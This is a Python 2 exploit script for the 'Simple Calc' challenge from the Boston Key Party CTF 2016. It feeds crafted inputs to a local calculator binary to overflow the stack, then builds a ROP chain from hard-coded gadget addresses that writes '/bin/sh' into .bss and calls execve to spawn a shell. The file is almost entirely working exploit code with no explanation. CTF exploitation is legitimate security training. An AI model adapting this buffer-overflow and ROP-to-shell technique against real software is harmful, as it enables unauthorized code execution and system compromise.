[Boston Key Party CTF 2016] Simple Calc

exploit.py

from subprocess import *

p = Popen('./simple_calc', stdin=PIPE, stdout=PIPE)

addr_bss = 0x0000000006c2c40
rdi = 0x493fd6
rsi = 0x0048acea
rdx = 0x00437a85
rax = 0x004749d8
ptrrax_rdx_rbx = 0x0047efb8 #: mov qword [rax], rdx ; pop rbx ; ret  ;  (1 found)
syscall = 0x004b054b

def add(x, y):
    p.stdin.write('1\n')
    p.stdin.write(str(x) + '\n')
    p.stdin.write(str(y) + '\n')


def sub(x, y):
    p.stdin.write('2\n')
    p.stdin.write(str(x) + '\n')
    p.stdin.write(str(y) + '\n')

def rop(addr):
    p.stdin.write('2\n')
    p.stdin.write(str(addr+1000) + '\n')
    p.stdin.write('1000\n')
    p.stdin.write('2\n')
    p.stdin.write('1000\n')
    p.stdin.write('1000\n')

p.stdout.readline()
p.stdout.readline()
p.stdout.readline()
p.stdout.readline()
p.stdout.readline()
p.stdin.write('255\n')

#for i in range(20):
#    add(0x1000, 0x1000 + i)
# 0xc, 0xd free()
for i in range(0xc):
    add(0x1000, 0x1000 + i)

###padding###
sub(0x1000, 0x1000)
sub(0x1000, 0x1000)
sub(0x1000, 0x1000)
sub(0x1000, 0x1000)
sub(0x1000, 0x1000)
sub(0x1000, 0x1000)
#############
#rip
rop(rax)
rop(addr_bss)
rop(rdx)
###"/bin/sh" to bss
p.stdin.write('2\n')
p.stdin.write(str(int('nib/'.encode('hex'), 16) + 1000) + '\n')
p.stdin.write('1000\n')

p.stdin.write('2\n')
p.stdin.write(str(int('\x00hs/'.encode('hex'), 16) + 1000) + '\n')
p.stdin.write('1000\n')
###
rop(ptrrax_rdx_rbx)
rop(0xdeadbeef)
rop(rdi)
rop(addr_bss)
rop(rdx)
rop(0)
rop(rsi)
rop(0)
rop(rax)
rop(0x3b)
rop(syscall)

raw_input()

"""
p 0x7fffffffe2c8 - 0x7fffffffe280
$1 = 0x48
"""

p.stdin.write('5\n')
p.stdin.write('echo PWNED > hoge\n')